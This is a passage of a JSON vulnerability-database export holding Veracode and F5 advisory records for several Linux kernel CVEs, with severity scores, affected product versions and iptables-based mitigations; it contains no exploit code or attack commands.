functionality does not work for 32-bit KVM paravirtualized guests. 
A local, unprivileged guest user could potentially use this flaw to leak kernel stack addresses.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.3, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2019-05-02T05:29:38", "type": "veracode", "title": "Information Disclosure", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8134"], "modified": "2023-02-13T01:49:27", "id": "VERACODE:16928", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-16928/summary", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-04-18T14:25:35", "description": "Linux kernel is vulnerable to denial of service (DoS) attacks. An attacker could exploit a flaw in the `drivers/md/dm.c:dm_get_from_kobject()` function which could be caused by local users leveraging a race condition with `__dm_destroy()` during creation and removal of DM devices. 
\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-05-16T02:50:39", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18203"], "modified": "2022-04-19T18:13:37", "id": "VERACODE:19177", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-19177/summary", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-04-18T14:00:12", "description": "Linux kernel is vulnerable to a NULL pointer dereference. This occurs in the Key Management subcomponent of the Linux kernel when trying to issue a KEYCTL_READ on a negative key. Local attackers could cause a denial of service condition via a crafted KEYCTL_READ operation. 
\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-05-16T02:13:53", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12192"], "modified": "2023-02-13T01:47:24", "id": "VERACODE:18887", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-18887/summary", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-04-18T14:24:41", "description": "Linux kernel that is built with `CONFIG_POSIX_TIMERS` and `CONFIG_CHECKPOINT_RESTORE` is vulnerable to information disclosure. An out-of-bounds access in the `show_timer` function in the `timer_create` syscall implementation in `kernel/time/posix-timers.c` allows userspace applications to read arbitrary kernel memory containing confidential information. 
This is due to an improper validation of the `sigevent->sigev_notify` field when `/proc/$PID/timers` is read.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-01-15T09:26:26", "type": "veracode", "title": "Information Disclosure", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18344"], "modified": "2020-10-15T15:09:39", "id": "VERACODE:13144", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-13144/summary", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-04-18T13:13:23", "description": "kernel is vulnerable to denial of service (DoS) attacks. 
The vulnerability exists as the (1) udp_recvmsg and (2) udpv6_recvmsg functions in the Linux kernel before 4.0.6 do not properly consider yielding a processor, which allows remote attackers to cause a denial of service (system hang) via incorrect checksums within a UDP packet flood.\n", "cvss3": {}, "published": "2019-01-15T09:09:53", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5364"], "modified": "2023-02-02T21:36:23", "id": "VERACODE:11917", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-11917/summary", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-04-18T14:02:31", "description": "Linux kernel is vulnerable to privilege escalation attacks. This allows local users to gain privileges by triggering access to a paging structure by a different CPU. 
This leads to unauthorized actions being performed.\n", "cvss3": {"exploitabilityScore": 1.4, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-02T05:51:58", "type": "veracode", "title": "Privilege Escalation", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2069"], "modified": "2022-04-19T18:15:32", "id": "VERACODE:17713", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-17713/summary", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T13:24:33", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system. * A use-after-free flaw was found in the way the Linux kernel's key management subsystem handled keyring object reference counting in certain error path of the join_session_keyring() function. A local, unprivileged user could use this flaw to escalate their privileges on the system. (CVE-2016-0728, Important) Red Hat would like to thank the Perception Point research team for reporting this issue. All kernel-rt users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. 
The system must be rebooted for this update to take effect.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-02T05:20:50", "type": "veracode", "title": "Integer Overflow", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0728"], "modified": "2023-02-13T01:48:41", "id": "VERACODE:16632", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-16632/summary", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-04-18T13:27:17", "description": "Red Hat Enterprise MRG (Messaging, Realtime, and Grid) is vulnerable to denial of service. 
An attacker can use a malicious device with a large amount of (1) EHCI or (2) XHCI data associated with an event to cause out-of-bounds write via the `magicmouse_raw_event` function in `drivers/hid/hid-magicmouse.c`.\n", "cvss3": {}, "published": "2019-01-15T09:02:01", "type": "veracode", "title": "Denial Of Service", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3181"], "modified": "2019-05-15T06:18:07", "id": "VERACODE:11436", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-11436/summary", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-04-18T13:26:42", "description": "kernel-rt is vulnerable to arbitrary code execution. 
The vulnerability exists through the `UDP_CORK` option in a setsockopt systemcall.\n", "cvss3": {}, "published": "2019-05-02T04:56:30", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4470"], "modified": "2023-02-13T07:17:58", "id": "VERACODE:14987", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-14987/summary", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2020-04-06T22:40:48", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", 
"integrityImpact": "NONE", "baseScore": 3.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 1.4}, "published": "2015-08-13T20:55:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2014-8134", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8134"], "modified": "2019-09-07T02:46:00", "id": "F5:K17120", "href": "https://support.f5.com/csp/article/K17120", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-06-08T18:44:24", "description": "**Note**: As of February 17, 2015, AskF5 Security Advisory articles include the Severity value. Security Advisory articles published before this date do not list a Severity value.\n\nRecommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. 
The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL10322: FirePass hotfix matrix\n * SOL12766: ARX hotfix matrix\n * SOL3430: Installing FirePass hotfixes\n * SOL6664: Obtaining and installing OPSWAT hotfixes\n * SOL10942: Installing OPSWAT hotfixes on BIG-IP APM systems\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 1.4}, "published": "2015-08-13T00:00:00", "type": "f5", "title": "SOL17120 - Linux kernel vulnerability CVE-2014-8134", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8134"], "modified": "2015-08-13T00:00:00", "id": "SOL17120", "href": 
"http://support.f5.com/kb/en-us/solutions/public/17000/100/sol17120.html", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2023-05-31T16:57:42", "description": "The dm_get_from_kobject function in drivers/md/dm.c in the Linux kernel before 4.14.3 allow local users to cause a denial of service (BUG) by leveraging a race condition with __dm_destroy during creation and removal of DM devices. ([CVE-2017-18203](<https://vulners.com/cve/CVE-2017-18203>))\n\nImpact\n\nTraffix SDC\n\nThis vulnerability may allow a denial-of-service (DoS) attack on the affected system.\n\nBIG-IP, BIG-IQ, F5 iWorkflow, Enterprise Manager, and ARX \n\nThere is no impact; these F5 products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-07-17T15:06:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2017-18203", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18203"], "modified": "2018-07-17T15:06:00", "id": "F5:K41101201", "href": "https://support.f5.com/csp/article/K41101201", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}}, 
{"lastseen": "2023-02-08T15:43:33", "description": "The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel before 4.14.8 doesn't properly validate the sigevent->sigev_notify field, which leads to out-of-bounds access in the show_timer function (called when /proc/$PID/timers is read). This allows userspace applications to read arbitrary kernel memory (on a kernel built with CONFIG_POSIX_TIMERS and CONFIG_CHECKPOINT_RESTORE). ([CVE-2017-18344](<https://vulners.com/cve/CVE-2017-18344>))\n\nImpact\n\nA local attacker may use this vulnerability to expose sensitive information or cause a denial of service (DoS), making the system unresponsive.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-08T02:20:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2017-18344", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18344"], "modified": "2022-10-28T03:49:00", "id": "F5:K07020416", "href": "https://support.f5.com/csp/article/K07020416", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-08T22:21:05", "description": "\nF5 Product 
Development has assigned ID 540174 (BIG-IP), ID 520651 (FirePass), ID 540056 (BIG-IQ and F5 iWorkflow), ID 540059 (Enterprise Manager), and ID 461496 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H544199 on the **Diagnostics** > **Identified** > **High** screen. \n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 12.0.0 \n11.6.0 - 11.6.1 \n11.0.0 - 11.5.4 \n10.1.0 - 10.2.4 | 12.1.0 \n12.0.0 HF1 \n11.6.2 \n11.6.1 HF1 \n11.5.5 | High | Linux kernel \nBIG-IP AAM | 12.0.0 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 | 12.1.0 \n12.0.0 HF1 \n11.6.2 \n11.6.1 HF1 \n11.5.5 | High | Linux kernel \nBIG-IP AFM | 12.0.0 \n11.6.0 - 11.6.1 \n11.3.0 - 11.5.4 | 12.1.0 \n12.0.0 HF1 \n11.6.2 \n11.6.1 HF1 \n11.5.5 | High | Linux kernel \nBIG-IP Analytics | 12.0.0 \n11.6.0 - 11.6.1 \n11.0.0 - 11.5.4 | 12.1.0 \n12.0.0 HF1 \n11.6.2 \n11.6.1 HF1 \n11.5.5 | High | Linux kernel \nBIG-IP APM | 12.0.0 \n11.6.0 - 11.6.1 \n11.0.0 - 11.5.4 \n10.1.0 - 10.2.4 | 12.1.0 \n12.0.0 HF1 \n11.6.2 \n11.6.1 HF1 \n11.5.5 | High | Linux kernel \nBIG-IP ASM | 12.0.0 \n11.6.0 - 11.6.1 \n11.0.0 - 11.5.4 \n10.1.0 - 10.2.4 | 12.1.0 \n12.0.0 HF1 \n11.6.2 \n11.6.1 HF1 \n11.5.5 | High | Linux kernel \nBIG-IP DNS | 12.0.0 | 12.1.0 \n12.0.0 HF1 | High | Linux kernel \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | None | High | Linux kernel \nBIG-IP GTM | 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | 11.6.2 \n11.6.1 HF1 \n11.5.5 | High | Linux kernel \nBIG-IP Link Controller | 12.0.0 \n11.6.0 - 11.6.1 \n11.0.0 - 
11.5.4 \n10.1.0 - 10.2.4 | 12.1.0 \n12.0.0 HF1 \n11.6.2 \n11.6.1 HF1 \n11.5.5 | High | Linux kernel \nBIG-IP PEM | 12.0.0 \n11.6.0 - 11.6.1 \n11.3.0 - 11.5.4 | 12.1.0 \n12.0.0 HF1 \n11.6.2 \n11.6.1 HF1 \n11.5.5 | High | Linux kernel \nBIG-IP PSM | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | None | High | Linux kernel \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | None | High | Linux kernel \nBIG-IP WOM | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | None | High | Linux kernel \nARX | 6.0.0 - 6.4.0 | None | Medium | Linux kernel \nEnterprise Manager | 3.0.0 - 3.1.1 | None | High | Linux kernel \nFirePass | 7.0.0 \n6.1.0 | 6.0.0 | Medium | Linux kernel \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ ADC | 4.5.0 | None | High | Linux kernel \nBIG-IQ Centralized Management | 4.6.0 - 5.1.0 | 5.2.0 - 5.3.0 | High | Linux kernel \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | High | Linux kernel \nF5 iWorkflow | 2.0.0 - 2.0.1 | 2.1.0 - 2.3.0 | High | Linux kernel \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | None | Medium | Linux kernel\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. 
For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nBIG-IP, BIG-IQ, and Enterprise Manager\n\nTo mitigate this vulnerability for the BIG-IP system, F5 recommends that you expose management access only on trusted networks.\n\nTraffix SDC\n\nTo mitigate this vulnerability for the Traffix SDC system, you can perform the following tasks:\n\n * When possible, remove **iptables **entries allowing traffic for the following UDP services: \n * **Syslog**: \n\n-A INPUT -i eth0 -p udp -m udp --dport 514 -m comment --comment \"SYSLOG\" -j ACCEPT\n\n * **SIP**: \n\n-A INPUT -p udp -m udp --dport 5060 -m comment --comment \"SIP protocol\" -j ACCEPT\n\n * **Diameter**: \n\n-A INPUT -d 192.168.1.71/32 -i eth0 -p udp -m udp --dport 3868 -j ACCEPT\n\n * Add source validation on **iptables **entries allowing traffic for the following UDP service: \n * **SNMP**: \n\n-A INPUT -i eth0 -p udp -m udp --dport 161 -m comment --comment \"statistics by SNMP\" -j ACCEPT \n-A INPUT -d 192.168.1.74/32 -i eth0 -p udp -m udp --dport 162 -m comment --comment \"SNMP TRAPS\" -j ACCEPT\n\n * Use anti-spoofing rules on the upstream firewalls.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n", "cvss3": {}, "published": "2015-09-25T02:05:00", "type": "f5", "title": "Linux kernel 
vulnerability CVE-2015-5364", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5364"], "modified": "2017-10-28T00:13:00", "id": "F5:K17307", "href": "https://support.f5.com/csp/article/K17307", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:45:04", "description": " \n\n\nThe (1) udp_recvmsg and (2) udpv6_recvmsg functions in the Linux kernel before 4.0.6 do not properly consider yielding a processor, which allows remote attackers to cause a denial of service (system hang) via incorrect checksums within a UDP packet flood. 
